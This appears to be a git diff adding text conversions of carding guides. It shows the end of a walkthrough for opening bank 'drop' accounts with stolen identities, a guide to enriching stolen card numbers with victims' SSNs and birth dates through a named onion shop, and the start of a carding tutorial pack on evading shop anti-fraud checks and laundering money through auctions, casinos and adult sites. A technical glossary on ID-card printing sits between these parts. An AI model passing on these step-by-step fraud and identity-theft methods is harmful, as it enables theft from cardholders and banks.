want, card peoplefinder.com and find their birth dates. If you don't pass the questions the +​​ ​ +first time you will have a second chance to open the account. Wait for 24 hours and you will get +an email that will let you know how pleased they are if you will continue your application. It +happened to me many times and at random times I did not have to answer the questions again +if I clicked on the link from the mail. +After you completed the questions you will get a confirmation message, that the account is +opened and your account number. (starting with X) After this, you will have to agree with +emailed documents, meaning you will go Paperless. Accept the terms, when asked if you are a +proffesional or non­ professional trader, select non­professional, don't check the box that's +talking about you having problems with IRS. +After this you will be invited to enroll to Online banking, accept, create a username and +password, select a Security Question and Answer and you are DONE! +At one point you will be asked if you will use all the time this computer . If you are not sure on +about your RDP (if you choose not to go with what I recommended) select No, otherwise, select +Yes and make sure you don't change the RDP/VPS/IP. + +DEPOSIT: +Same as with Bank of America. This will be the same to all of the accounts. +✪ SunTrust ✪ +OPENING: +Basically you follow the same steps as with first 3 accounts, the only difference here is that you +need the issue date for the Driver License. I use a invented one every time and every time it +works. +Questions are the same as for Fidelity, so make sure you have the Motor Record open along +with Credit Record and Background Check. I never used this bank drop to payment processors +so I can't tell you if it's great or not. It's easy to open it (and this is what this guide is all about) +but I don't know how it will work with Stripe/Square/etc. I heard different feedbacks on AlphaBay +forum... so it's up to you if you want to use it for that or you want to use it for loans or cashing +out Paypals or other stuff. Sometimes they will send the card to your drop automatic, if that +happens and you dont have a US parter to receive the card, the account is burned. Rinse and +repeat. + +DEPOSIT: +Same old, same old. +✪ E*TRADE ✪ +OPENING: +Click on E*trade bank and then on the right hand you will see "Open Account" on a green +button. Click it. On the next screen, click on "apply now". +On the next screen, fill the info bellow "Are You New to E*TRADE?". Remember that, in order to +fully use this account you will need a US drop as they will mail you the "Welcome Kit". If you +don't have a drop, and you think you are good enough with english language, you can always +spoof you phone number and call them, telling them you don't want the "Welcome Kit" to be +send to your mail because your mother thinks banks are evil and she is old and has some +mental problems and you don't want to disturb her health. For spoofing numbers, use +Spooftel.com (i won't get into much here, as there are free info on forums). Create a username +and a password and click on continue. For this drop you will need to know the driver license + +number style to use it for opening it. Enter the address of last employer and when asked for the +purpose of the account i always choose "Personal family account...". Now, as for all, choose +individual account and click continue. No Choose E*Trade Checking. Don't accept card right +now. They will ask you about funding your account. The minimum funding is $100 and you can +do it as ACH ­ QuickTransfer, an E*TRADE service ­ (you must give the debited account +number and routing) or wire or check. No matter what you choose for the moment you will be +able to change it after the account is opened. On the next screen you will have to choose the +funding amount. Anything north of $100 is ok. Good, now your account is opened. Next step is +go "Accounts>MyAccounts>Paperless Settings" and choose full paperless. +The bank will send the card to your address, so it very important to make the account on +Saturday, chat with them and tell them that you are not in the country for the next 3­4 weeks. +They will ask you to call them and tell them that and they should hold the card till you arrive in +the country. Call them in one day, from a number from any country that you say you are in. +Keep the background report and credit report open in case they ask anything from inside them. +(i had no such questions, only about when the account was opened, what type of account, what +you want to do with it (invest, dooh)) +You should be fine with the account for the next 3­4 weeks, enought to handle the transactions +through it. +DEPOSIT: +Same old, same old. diff --git a/BONUS-ConvertCVVintoFULLZ_pdf.md b/BONUS-ConvertCVVintoFULLZ_pdf.md new file mode 100644 index 0000000..da06d04 --- /dev/null +++ b/BONUS-ConvertCVVintoFULLZ_pdf.md @@ -0,0 +1,45 @@ +# BONUS-ConvertCVVintoFULLZ + + +--- + +How to Convert CVV into FULLZ +­By Sacky +Okay so many of you buy some credit card infos, but they do not come with DOB or SSN. +However, there is a way to get them. +Step 1) Getting the phone number +If your info does not have the phone number, you should get it. For that, go on +www.whitepages.com. +Enter the name of the victim and the zip code. In most of the times, you will get the phone +number. +Otherwise, try social media. It can help, but whitepages has a better chance of success. +Step 2) Getting the DOB and SSN +There is 1 place where you can get the SSN of your victim. There is a service called Yale +Lodge, their URL is yale.cm or onion +yaleshopurdewuubyrmpnhyphkpjmgpurd54dso3s36xtlemrlrhvjad.onion +There you can enter the name and state of the person, and their DOB and SSN will show. You +have to pay $19 in bitcoins for each record you buy. +The site also has a history function that allows you to view your purchases at a later time. Once +you got the phone number, DOB and SSN, you are good to go. One more step before you buy +something... +Step 3) Getting the available balance of the card +How to make sure your card has a decent balance on it is simple. +The 6 first digits of the card number are called the BIN (check the wiki for the meaning of +acronyms). +So go on www.bindb.com or yale.cm, do a BIN lookup, and you will get the name of the bank. +So google bank name credit card phone and you will get the phone number of the card service. +Spoof your caller ID (not required but recommended) and call the bank. Using the automated +system, you are able to verify the balance of the card. +They ask questions such as 4 last digits of SSN, zip code, DOB, etc. This is all the info you +already have, so you can get any balance. Ideal for purchases! +Step 4) Getting the Mother Maiden Name +There is no known site that gets this information 100% accurately, but here are a few things you +can try +­ Card www.ancestry.com to lookup some records +­ Use Facebook (search for account using e-mail address) + +­ Use social engineering (can backfire if you're not skilled) +With all of this info, you can card shit more easily. Use these infos in any way that you think will +benefit you. +REMEMBER: Be safe! +-Sacky diff --git a/Basics_of_Card_Printing_pdf.md b/Basics_of_Card_Printing_pdf.md new file mode 100644 index 0000000..d229af9 --- /dev/null +++ b/Basics_of_Card_Printing_pdf.md @@ -0,0 +1,413 @@ +# Basics of Card Printing + + +--- + +Basics of Card Printing +How Card Printers Work +Printing Process +Magnetic Stripe Encoding +Smart Card Encoding +Card Lamination +Card Security Features +Glossary of Terms +(Source: ID Edge Learning Centre) + +How ID card printers work +The Original Way to Make ID Cards +Prior to the early 1990s, the most common method of producing an ID card was known as the film-based +method. This involved taking a person’s photo, cutting it out and laminating it to a card-sized piece of paper +containing the person’s name, ID number and any other personal information. +Although the initial investment for a film-based system was relatively low, +the time, labor and individual cost per card was high. Plus, these cards were easily counterfeited. As a +result, a new method called digital printing arose during the late 1980s and early 1990s. +Benefits of Digital Printing +Image quality +The image quality of plastic cards produced with digital printing technology is far superior to those produced +through the traditional manual method described above. The cards look better because digitized photo +images are sharper and can be edited for color quality. Placement of various graphical elements of the card +is more consistent and text is clearer and more readable. +Flexibility +Plastic card printers can print text, line art and photographic images. They also can encode magnetic stripes +and provide smart card chip programming contact stations, all in a single-step process. Card design +software used to produce the cards provides users the flexibility to change designs, store and access +multiple designs, create variable text fields and implement database programs to store images and track +information. +Security +Plastic card printers also can apply various types of card protection materials to make cards resistant to +tampering and alteration. These protection materials, including hologram overlays, make cards more secure +because they cannot be easily reproduced or counterfeited. +Durability +Card protection materials such as overlay varnishes, overlaminate patches and secure card media each +provide various levels of card durability by making the cards resistant to abrasion, UV light exposure, water +damage and exposure to liquid chemicals. +Economy +In-house printing of plastic cards using a digital card printer takes far less time than the old film-based +method. While the intial capital cost is higher, the cost per card is far less than the old method. +Convenience +Printing your own plastic cards gives you the convenience of being able to produce cards when you need +them, where you need them, letting you issue new cards on demand. Having your own card printer +capability also makes it easy to make changes to card content or design quickly. +Printing Process +Dye Sublimation and Thermal Transfer +Most plastic card printers feature the same basic printing operations - dye sublimation and/or thermal +transfer printing. Both techniques involve a ribbon being heated as it passes under a thermal print head. +The difference is that thermal transfer ribbons heat up and transfer ink onto the plastic card, and dye +sublimation ribbons heat up and undergo a chemical change process that turns the ink into a gaseous state +which then permeates the plastic card. + +The ribbon used in color dye sublimation printing is divided into three separate color panels: yellow, +magenta and cyan (see Figure 1). This configuration is referred to as YMC. +yellow magenta cyan yellow magenta cyan +These three colors are the primary colors used in printing to +produce all other colors including black. +The dye from the ribbon is applied to the plastic card via a multi-pass operation. This means the card will +pass under the print head once for each of the three colored ribbon panels, applying each color separately. +The term dye sublimation also is referred to as dye diffusion. When the dye on the ribbon is heated by the +print head it is transformed from a solid to a gas and diffused onto the plastic card (the card is specially +coated to absorb the color dye). The hotter the elements in the print head, the more dye is converted to a +gas and absorbed into the plastic card. At 300 dpi the picture quality and continuous color tones produced +by a dye sublimation printer outperform most laser or ink jet printers with higher resolutions. +The advantage of dye sublimation is the millions of colors that can be created. The colors result from a +combination of the panels on the ribbon. By combining these colors and varying the intensity of the heat, +providing various shades of each color, you are virtually unlimited in your color selection. +Thermal transfer differs from dye sublimation in that thermal transfer uses ink rather than dye. Both dye +sublimation and thermal ink (sometimes refered to as resin) can be combined in one ribbon (see Figure 2). +This ribbon is referred to as a YMCK ribbon. The letter "K" is the designator for the color black in the printing +industry. +yellow magenta cyan black yellow magenta cyan black +Why do you need a separate black panel, when you can create +black by mixing the three basic YMC colors together? +The answer to this question is simple. When black is created by mixing the YMC colors together it creates +what is referred to as "composite black." Composite black typically looks muddy or has a grayish tint when +compared to thermal transfer (TT or resin) black. Composite black is not recommended for printing bar +codes since combining the three colors together does not produce the sharp edge many scanners require +(this is invisible to the naked eye but can be observed under magnification). Composite black also is invisible +to IR scanners because there is no carbon in the dye. Since you may not know what type of scanner will be +used, the rule is to always use TT (resin) black to print bar codes. +All color printers are capable of printing in monochrome using a single color ribbon. These ribbons are less +expensive than full-color multi-panel ribbons and can be either dye or ink (thermal transfer). The most +commonly used monochrome ribbon is black, but there are several other colors available, including red, +green and blue. +Monochrome +Dye sublimation ribbons are preferred when you are printing pictures, because they can produce many +shades of gray for a smoother look and a better picture quality. A resin black picture normally uses a +dithered gray scale (gray made from a combination of pixels which limits the number of shades), producing +a coarser, grainy look to the image. + +Thermal transfer (resin) ribbons should be used to print text, bar codes or single color +graphics such as simple logos. Black monochrome ribbons are represented by the +letter "K" followed by a lower case "r or d", (Kr or Kd). The "r" designates a thermal +transfer ribbon with resin ink. The "d" designates a dye sublimation ribbon. +Reverse transfer +This process prints images on the reverse side of a retransfer film. The film is then laminated to the face of +a PVC card with heat and pressure. The process uses the same four color panels as a dye sublimation printer +but produces much higher quality because the dye bleeds less on the film than it does on a PVC card. Also, +since the film is laminated to the card it is virtually impossible to tamper with the card without destroying it. +Inkjet printing +Inkjet printing has been around for a long time and is common in today's office. However, it has just been +introduced to ID card printing. Currently, only Fargo has inkjet printers and they require specially +formulated ink and PVC cards to work. +There are three main steps to producing a drop with thermal technology. First, the chamber holding the ink +bubble is heated. Second, the bubble bursts due to heat and the ink drop shoots out of the nozzle. Finally, +the vacuum from the drop leaving the chamber draws the next bubble into the chamber. There are between +300 and 600 nozzles per print head, all of which can fire at the same time. "These deliver drop volumes of +around 8 - 10 [picoliters] (a [picoliter] is a million millionth of a [liter]), and dot sizes of between 50 and 60 +microns in diameter." Thirty microns is the smallest dot size visible to the naked eye. +There are 300 to 600 of these firing mechanisms per print head. Four to eight of these tiny drops are fired +onto the paper to make a color dot. Larger dots of 35 picoliters are usually created with black inks. Part of +this difference is that the colors are usually created with dye-based ink and the black ink is a pigment-based +ink. Dye-based inks produce a wide range of vibrant colors whereas pigment-based inks are more durable +and water-resistant. Pigment-based inks also have larger molecules because they are particles suspended in +solution. Because thermal technology uses heat to create the drop, all the inks used must be heat resistant. +This narrows the selection of inks and their characteristics such as water-resistance. +Magnetic Stripe Encoding +Magnetic stripe cards have been in existence since the early 1970s when they were used on paper and film- +based ID cards as well as credit cards. Magnetic stripe technology is widely used throughout the world and +remains the dominant technology in the United States for transaction processing and access control. Other +technologies such as PDF bar codes and smart chip cards now are capturing part of the magnetic stripe +market because they can hold more information. +Magnetic Stripe Plastic Card + +Magnetic stripe encoding terms: +Coercivity +A technical term used to designate how strong a magnetic field must be to affect data encoded on a +magnetic stripe. Coercivity is measured in Oersteds (Oe). Coercivity is the measure of how difficult it is to +encode information in a magnetic stripe. +HiCo +Abbreviation for High Coercivity. HiCo magnetic stripes provide the highest level of immunity to damage by +stray magnetic fields. They are more difficult to encode than LoCo magnetic stripes because the encoding +requires more power. HiCo magnetic stripe cards are slightly more expensive for this reason. +LoCo +Abbreviation for Low Coercivity. Easier to encode and slightly less expensive than HiCo magnetic stripe +cards. +ISO Magnetic Stripe Encoding +International Standards Organization specification for magnetic stripe encoding. The Fargo encoder supports +dual high/low coercivity and tracks 1, 2 and 3. +JIS II Magnetic Stripe Encoding +Japanese Industrial Standard for magnetic stripe encoding; published and translated into English by Japan +Standards Association. +Stripe-up/Stripe-down +Stripe-up means the magnetic stripe is on the front of the card and stripe-down means the magnetic stripe +is on the back of the card. This information is important when ordering a printer since the magnetic encoder +must be installed differently for stripe-up and stripe-down models at the factory. The most common is +stripe-down. +Select the right type for the job +Selecting which type of magnetic stripe to adopt depends on how the card is to be used. Will the magnetic +stripe be used daily, once a month or just a couple of times a year? The chart below shows some of the +applications where magnetic stripes are used and which stripe is common for that application. +Applications LoCo HiCo Usage +Access Control Daily +Retail Customers Weekly +Membership Cards Weekly/Monthly +Time and Attendance Daily +Debit/Credit International United States weekly/monthly +Occationally - HiCo +Driver's Licence +required by most states +How to visually identify which kind of stripe is on a card +The easiest way to determine visually if a stripe on a card is HiCo or LoCo is by the color. HiCo stripes are +black and LoCo stripes are a lighter brown. Magnetic stripe readers are "blind" as to whether a stripe is HiCo +or LoCo and are designed to read both. + +Smart Card Encoding +There are a wide variety of contact and contactless smart cards currently in use. The terms "smart chip +card," "IC card" and "smart card" all refer to the same type of card. Smart cards have a chip embedded in +them which can be programmed. Smart cards can store more than 100 times more information than a +magnetic stripe and they can be reprogrammed to add, delete or rearrange data. +Smart cards were invented in Europe in the 1970s and were in wide use in Western Europe by the early +'80s. Smart cards are an easy, inexpensive way for European businesses to do offline transaction +verification. The reason offline verification is preferred is the high cost of telecommunications throughout +Europe. The United States has been slow to implement smart cards because it would require replacing the +widely installed magnetic stripe card reading equipment with smart card readers. The cost of having the +current magnetic stripe readers "online" via telecommunications is relatively inexpensive in the U.S. +compared to the rest of the world. +Microprocessor +Smart Card +The second type of smart card contains both a microprocessor as well as memory. These cards can store +massive amounts of information, plus the microprocessor enables the card to make its own decisions +regarding the information stored. +Both types of chips can be addressed by Eltron card printers since they all offer an optional smart card +contact station. The printer brings the card into the contact station and then passes programming signals +from an external programmer to encode the smart chip. +Contactless smart cards utilize various RFID technologies to write and read. Many card printers print on +these kinds of smart cards. Encoding or programming the electronic devices on these cards is typically +accomplished by an external encoding or programming device, but contactless smart card encoders +integrated into the card printer are becoming increasingly available. +Card Lamination +Various types of materials are used to protect plastic cards from abrasion, wear, fading, alteration and +duplications. Overlay varnishes and laminate patches are the most common materials used to enhance card +durability and security. +Card durability has to do with how well the card withstands various forms of environmental stress. They +include resistance to abrasion, such as passing the card through a magnetic stripe or bar code reader, +protection from image fading when exposed to sunlight, and resistance to damage when immersed in water +or exposed to chemicals. +Another important factor in applications such as driver's licensing is resistance to tampering, alteration +and/or replication. With the use of protective materials such as laminate patches with holograms, cards can +be constructed to eliminate the potential of tampering and alteration. +Card security means that the card can be verified for authenticity. Techniques include the application of +overlay varnish or overlaminate materials with hologram images. Use of these materials in constructing +cards makes replication by anyone without access to the custom hologram image materials virtually +impossible. + +Material Card Life Durability Security +Overlay Varnish Up to 2 years Minimal +Overlay Varnish +Up to 2 years Minimal Visual +with Hologram +Clear Patch +Up to 5 years High +Overlaminate +Patch Overlaminate +Up to 5 years High Visual +with Hologram +Overlay varnishes provide card protection, but have a much shorter life span that laminate patches - and +offer very little security (with the exception of some hologram varnishes). Varnishes are not a solid covering +and have multiple tiny holes in the surface, which allows the dyes to be drawn away from the card. This will +cause the image on the card to blur and fade due to UV light, shift in color or just wear away. The life +expectancy of a plain plastic card is up to two years. +Laminate patches offer better protection than plain varnish, for both security and life expectancy. A patch +laminate is, as its name implies, a polyester patch that is applied to the surface of the card after printing. +Laminate patches, most often either .6 or 1.0 mil thick are applied via a hot roll laminating station. The life +expectancy of a plastic card with a laminate patch is up to seven years. +Glossary of Terms +Access Control Cards +Plastic cards used to gain access to premises, usually associated with magnetic stripe and proximity cards. +Bar Code +An array of machine-readable rectangular bars and spaces arranged in a specific way defined in +international standards to represent letters, numbers and other human-readable symbols. +Biometrics +Biometrics utilize "something you are" to authenticate identification. This might include fingerprints, retina +pattern, iris, hand geometry, vein patterns, voice password or signature dynamics. Biometrics can be used +with a smart card to authenticate the user. The user's biometric information is stored on a smart card, the +card is placed in a reader and a biometric scanner reads the information to match it against that on the +card. This is a fast, accurate and highly secure form of user authentication. +Coercivity +A technical term used to designate how strong a magnetic field must be to affect data encoded on a +magnetic stripe. Coercivity is measured in Oersteds (Oe). Coercivity is the measure of how difficult it is to +encode information in a magnetic stripe. +Color Matching +Several color matching options are included with Fargo Card Printer/Encoders. These options are built +directly into the printer driver so they are easily selected. Colors print with more clarity, detail and accuracy. +Contact Smart Card Encoder +The contact smart card encoder connects the ISO contact pins mounted on the e-card docking station to a +Gemplus GemCore 410 smart card coupler mounted inside the printer. The GemCore 410's digital I/O is +converted to a RS-232 signal which is accessible to application programs through a dedicated DB-9 port on +the outside of the printer labeled "Smart Card." + +Contactless Smart Card Encoder +The contactless smart card encoder connects an antenna mounted on the e-card docking station to a +Gemplus GemEasyLink 680SL coupler mounted inside the printer/encoder. Application programs can access +Mifare® contactless cards via a RS-232 signal through a dedicated DB-9 port on the outside of the printer +labeled "Mifare/Contactless." +Digital Imaging +Scanning or otherwise capturing images which may be subsequently edited, filed, displayed or printed on a +plastic card. +Direct-to-Card (DTC) Printing +The Direct-to-card printing process prints digital images directly onto any plastic card with a smooth, clean, +glossy PVC surface. +Dye Sublimation +Dye sublimation is the print process Fargo Card Printer/Encoders use to print smooth, continuous-tone, +photo-quality images. This process uses a dye-based ribbon roll that is divided into a series of color panels. +The color panels are grouped in a repeating series of three separate colors along the length of the ribbon: +yellow, magenta and cyan (YMC). As the ribbon and card pass simultaneously beneath the printhead, +hundreds of thermal elements heat the dyes on the ribbon. Once the dyes are heated, they vaporize and +diffuse into the surface of the card. Varying the heat intensity of each thermal element within the printhead +makes it possible for each transferred dot of color to vary saturation. This blends one color into the next. +The result is continuous-tone, photo-realistic color images. +Docking Station +Fargo provides an optional e-card docking station on select models that can be ordered with encoders for +one, two or three different types of e-cards. These printer/encoders allow application software to read +and/or store information in the memory of e-cards. The optional encoders provide everything needed for an +application program to communicate with a specific type e-card through a standard RS-232 interface. The +Fargo e-card docking station comes standard with the read/write pins (as defined by ISO) needed to +communicate with contact smart cards. The e-card docking station also can be ordered with a magnetic +stripe encoder for either an ISO magnetic stripe that supports dual high/low coercivity tracks 1, 2 and 3 or a +JIS II magnetic stripe. +Encoding +The process of electronically "writing" information on magnetic stripes or smart card chips. +E-card Encoder +Fargo Card Printer/Encoders support reading and/or storing information in up to three different types of e- +cards: ISO 7816 contact smart cards, Mifare® contactless smart cards and HID proximity cards. +Edge-to-Edge +Refers to the maximum printable area on a card. Printer/encoders with edge-to-edge printing capability can +print just to the edge of a card resulting in printed cards with virtually no border. +HiCo +Abbreviation for High Coercivity. HiCo magnetic stripes provide the highest level of immunity to damage by +stray magnetic fields. They are more difficult to encode than LoCo magnetic stripes because the encoding +requires more power. HiCo magnetic stripe cards are slightly more expensive for this reason. +High-Volume Printing +Fast, efficient printing for producing large quantities of cards with minimal down time for supplies loading or +maintenance. +High Definition Printing™ (HDP™) +The high-definition printing process prints full-color images onto clear HDP transfer film. The HDP film is +then fused to the card through heat and pressure via a heated roller. This revolutionary technology +enhances card durability and consistently produces the best card color available - even on tough-to-print +matte-finished cards, proximity cards and smart cards. +High-Speed Printing +Fargo Card Printer/Encoders are among the fastest desktop card printer/encoders in the industry. High- +speed printing allows for more efficient card production - saving time, money and resources. + +Hologram +A unique photographic printing that provides a three-dimensional effect on a flat surface. Holograms cannot +be easily copied and are used for security and aesthetic purposes on cards. +Image Capture System +A hardware and software system used to obtain and save personal data and cardholder photographic +images. +ISO Magnetic Stripe Encoder +International Standards Organization specification for magnetic stripe encoding. The Fargo encoder supports +dual high/low coercivity and tracks 1, 2 and 3. +JIS II Magnetic Stripe Encoder +Japanese Industrial Standard for magnetic stripe encoding; published and translated into English by Japan +Standards Association. +Lamination +The process of combining lamination material and core material using time, heat and pressure. Laminate +patches used in card printers come on rolls, with and without carriers/liners. +LCD Display +The LCD - or Liquid Crystal Display - shows the current status of the printer and changes according to the +printer's current mode of operation. LCD communicates an error with text, which is easier to interpret than +LED lights. +Lockable Hopper +Some Fargo Card Printer/Encoders provide a lockable card hopper door. This lock is intended to help prevent +theft of your blank card stock. This feature is especially helpful if using valuable card stock such as +preprinted cards, smart cards or cards with built-in security features such as holograms. +LoCo +Abbreviation for Low Coercivity. Easier to encode and slightly less expensive than HiCo magnetic stripe +cards. +Machine-Readable +A code or characters that can be read by machines. +Magnetic (“Mag”) Stripe +Mag stripe refers to the black or brown magnetic stripe on a card. The stripe is made of magnetic particles +of resin. The resin particle material determines the coercivity of the stripe; the higher the coercivity, the +harder it is to encode - and erase - information from the stripe. Magnetic stripes are often used in +applications for access control, time and attendance, lunch programs, library cards and more. +Memory Card +A type of smart card. Also known as a synchronous card, it features 256 bit or 32 byte memory and is +suitable for use as a token card or identification card. +Output Stacker +The output stacker stores printed cards in a first-in/first-out order. This feature makes it easy to keep +printed cards in a specific order for faster issuance or to print serialized cards. +Oversized Cards +Oversized cards are used for more efficient visual identification and are available in many nonstandard sizes. +The most popular sizes are CR-90 (3.63" x 2.37"/92 mm x 60 mm) and CR-100 (3.88" x 2.63"/98.5 mm x +67 mm). +Overlaminate +Protective clear or holographic material designed to offer advanced card security and durability. Two types +are available from Fargo: Thermal Transfer Overlaminate is a .25 mil thick material that enhances card +security and durability. PolyGuard Overlaminate is available in a 1 mil and .6 mil thick material and provides +extraordinary protection for applications that require highly durable cards. + +Overlay Panel +The clear overlay panel (O) is provided on dye sublimation print ribbons. This panel is automatically applied +to printed cards and helps prevent images from premature wear or UV fading. All dye sublimation printed +images must have either this overlay panel or an overlaminate applied to protect them. +Overlay Varnish +A thin transparent layer applied (using the print head) to cards to resist scratching and fading from +exposure to UV radiation. +Over-the-Edge +Refers to the maximum printable area on a card. Printer/encoders with over-the-edge printing capability can +print past the edge of a card resulting in printed cards with absolutely no border. +PolyGuard™ +A card overlaminate available in 1 mil and .6 mil thicknesses that provides extraordinary card protection; +ideal for harsh or more secure environments. Available as clear or with embedded holographic-type security +images. +Proximity (“Prox”) Card +Proximity cards allow access and tracking utilizing contactless technology (usually by communicating +through a built-in antenna). +Prox Card Encoder +The prox card encoder uses a HID ProxPoint® Plus reader mounted on the e-card docking station inside the +printer/encoder. The ProxPoint is a "read only" device producing a Wiegand signal that is converted to RS- +232 using a Cypress Computer Systems CVT-2232. Application programs can read information from HID +prox cards via a RS-232 signal through a dedicated DB-9 port on the outside of the printer labeled "Prox." +Resin Thermal Transfer +Resin thermal transfer is the process used to print sharp black text and crisp bar codes that can be read by +both infrared and visible-light bar code scanners. It is also the process used to print ultra-fast, economical +one-color cards. Like dye sublimation, this process uses a thermal printhead to transfer color from the +ribbon roll to the card. The difference, however, is that solid dots of color are transferred in the form of a +resin-based ink which fuses to the surface of the card when heated. This produces very durable, single-color +images. +Smart Card +Smart cards have an embedded computer circuit that contains either a memory chip or a microprocessor +chip. There are several types of smart cards: Memory, Contact, Contactless, Hybrid (Twin), Combi (Dual +Interface), Proximity and Vicinity. +SmartGuard™ +SmartGuard is a printer security option that uses a custom access card and a built-in reader to restrict +printer access. With this feature, only those with a valid access card can print cards. This makes both your +printed cards and your overall system more secure. +SmartShield™ +This option allows the printer/encoder to print custom, reflective security images on the card that fluoresce +under a black or UV light source. +Standard Cards +The standard card size is CR-80. CR-80 dimensions are 3.375" x 2.125" (85.6 mm x 54 mm). +Thermal Printing +The process of creating an image on a plastic card using a heated printhead. +Thermal Transfer Overlaminate +A card overlaminate available in a .25 mil thickness that increases card security and durability; often used +for moderate durability applications or when additional security (such as holographic images) are needed. +Resolution +Dimension of the smallest element of an image that can be printed. Usually stated as dots per inch (dpi). + +YMC +Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying +degrees to make a full spectrum of colors. YMCKO is the same as YMC plus black (K) and clear protective +overcoat (O). diff --git a/Big Carding Tutorials Pack (66 tutorials)_pdf.md b/Big Carding Tutorials Pack (66 tutorials)_pdf.md new file mode 100644 index 0000000..c39e111 --- /dev/null +++ b/Big Carding Tutorials Pack (66 tutorials)_pdf.md @@ -0,0 +1,9447 @@ +# Big Carding Tutorials Pack (66 tutorials) + + +--- + +About MMORPG +So, all it about games and game stuff. +1. MMORPG-Store's AntiFraud & Defence System. So elementary ways of such shops protection are: +- IP-address must be from the same state, better – city; +- Area code in entered phone must be from the same state; +- You’ll be invited to live chat and asked for some questions; +- If you’re looking nor trusted in first three steps, may be call requested; +2. About games themselves. You should know that many of game-masters don’t like that game currencies +are selling for real money. +So be ready that in one beautiful day you can see message like “Your account is banned. Reason is +hacker, scammer, fraudulent etc”. So you’re under the risk when you save on account at the age of a week +big amounts of game currencies. So don’t be lazy and enter periodically on the account and make +visibility that you’re real gamer and you like to play. And don’t forget that if you card the currencies – +there could be chargeback. And of course after it your accout will e blocked anyway. +3. What you need for work. +- good proxy-service of course with enough value of socks4/5 located in needed states/cities; +- credit card or better paypal or more better more than one paypal – needed to be explained? I think not; +- e-mail. It’s better don’t use e-mails like 238jerom32 @yahoo.com. Don’t be lazy to search for some +nicer addresses: something like MMORPG-KING @INORBIT.COM или SPACEWARRIOR +@GAMER.LA (easy.la – hundreds of free domains) или +LINEAGEFUN @WINNING.COM. +4. About shops and their owners. Most of popular MMORPG supermarkets belong to small yellow-skin +people with proud of that there are 1 000 000 000 of such people on the Earth. Second place take +Americans and the third place take nobody but it’s possible to put there people from ex-USSR. And what +interesting that last people don’t like to serve people from their countries and they mainly targeted on +USA and EU customers. +So that’s the list of things you will need: +a. Socks-service. Almost everyone knows where to find it. +b. VPN with good encryption. +c. Software: +- Permeo Security Driver, Socks Chain, FreeCAP and Other Analog +- Soft which changes OS Language,OS Regional Settings & Time Zone,Date. Browser Type & Language. +- Trusted track-eracer removing all info without recovering possible: CyberScrub,Ashampoo +,TICEraser,ACRONIS Privacy Suite and other analog) +d. AIM Messenger,Yahoo Messenger for possible contact with shop’s support. + +All About cashing +In this article I would like to point out some of the working at the present time means of making money +and laundering the earnings. +First of all what could you make money on? There are a many topics written that newbie can read, +although most of the schemes described are non-working or very difficult to realize. The main schemes +are: +- Adult +- Casino / Totalizator +- Auctions +Basically, many articles were written about it. In this article I am going to sum up the schemes and talk +about the last stage of carding - what to do with those sums that you managed to make using ways +mentioned above, to be exact v how to get cold hard cash in the palm of your hand. +Let's start with auctions. +I will not be talking about making sellers accounts or where to get them - I personally do not sell them so +if you are interested in that, search the forum. I will only talk about several characteristics of working +with accounts - i.e. what exactly you should do in order for the funds to reach the person that will turn +them into cash and eventually get the cash to you. +The first, and important factor of success is the amount of positive feedbacks (responses) on seller-s +account, which is the one you-ll be using. When the person searches through the auctions for the +merchandize to purchase he pays attention to sellers feedbacks or the lack there of. More feedbacks +translate into more trust from your potential buyer. +Do not overlook that after the winner is determined on your lot, you will have to communicate with the +buyer by the means of e-mail, therefore you will need to use good English v otherwise the unnecessary +suspicions might come into play. +On well-known online auction site eBay there is a list of some goods that are not allowed to be put up for +the auction, as for the rest, anything goes from socks up to washing machines. +Now about cashing. The most effective way of getting money out of the auctions - are and always were +checks. More precisely, not just any checks, but Money Orders and Cashier Checks. I will explain why: +- Why not wire transfer? The account used for wire will have a really short life span, nervous buyers have +a habit of checking when and where did their money go. Keep in mind that they will not wait for too long +so you are risking that the deal will go sour in the very end and you will not be able to collect. +- Why not Personal Check? Because, after sending personal check to your drop, the buyer and authorities +can easily track and subsequently stop the payment. Same applies to different escrow services like +BidPay. +- Money Orders and Cashier Checks v are not checks payable to a named person, but those that you can +buy at your local post office or the bank. Those only contain personal information if the buyer decided to +put it there. Postal Money Orders, in particular are impossible to stop payment on. +So now we-ve discussed the best ways of getting the money out of the auctions. Keep in mind one +nuance: try to ?work? on the buyer who has won your auction so that he stays calm as long as possible +about the validity of the deal. It-s in your interests: The longer your buyer remains assured of receiving +the merchandize, the longer your drop that receives checks lives, and therefore you?ll be able to make +more money. + +One more thing that is also very important to keep in mind: Make sure that the buyer is physically as far +away as possible from your drop - quite often there are such heroes that come to the address where they +sent the check, demanding their goods or money. +Now we shall proceed to on-line gambling and making money on that. +Everyone is familiar with the basic technique. The majority of schemes that are connected in one way or +the other with working in casinos are discussed on the CarderPlanet. I will talk only about some aspects +concerned with the final (the most important and crucial) stage - with cashing. +After a massive attack of carders on a casino that were processed by MicroGaming (MG), they have +ceased to send prizes on ACH as this kind of money transfer meant the name of the owner on the account +assigned is not checked. That basically means, the casinos from MG are hardly interesting anymore, +because the money withdrawal process has gotten to be quite complicated. +So v does that mean that casino theme has died? Not at all v There are other casinos that are served by +different processing companies - for example, EFS. If you dedicate some time on searching the net you +are sure to find something +Before working with any casino make sure not to overlook reading their policies. Find out ways of a +withdrawal. +After the certain sum of money was won, the initial deposit must be returned on a card. That assures that +no one get nervous neither the card owner nor a casino. And everyone, including you, will remain +pleased. +Further all is clear - go to reliable cashier for drop or the account, agree about interest and send transfer or +the check - depending on a method that this casino uses. +Further - adult (porn-sites). +I?d like to emphasize yet again that quite a lot was written and discussed on this subject. Don-t be lazy +and look in archives. A huge amount of information! +Briefly: +1. Create a site or order one from good web designer whom you-ll find on the Planet. A well-made, +professional site will improve your odds. +2. Fill it with the content. +3. Connect to billing of your choice that pays often. +4. Make or buy traffic and start to input the card numbers. +During this process pay special attention to changing your proxy servers. Each new card must be linked to +a different e-mail address. Do not overlook your system setting especially the language. +On the present day (July, 13, 2002), these are the main schemes in carding that are connected with +cashing. There is also a merchandize carding, working with your own merchants, and working with real +plastic - but these subjects demand considerable experience so I would not advise beginners to start with +them, nor they are connected with cashing, nuances of which were discussed in this article. +And, in conclusion, little about cashing and cashiers. + +Work only with professional and well-checked cashiers. Ideal choice - verified people. The beginner or +not a well-known cashier, even though he might not be a fake, can simple lack professionalism in this +subject (and believe me - in the work of cashier there is such heap of hidden dangers!) +Antifraud systems working +In all online shops which accept credit card was added "Credit Card Fraud Detection service" (further +CCFDs). It's task is to percent of possibility of fraud. It counts as named fraud score (FS) based on main +factors of legity. For 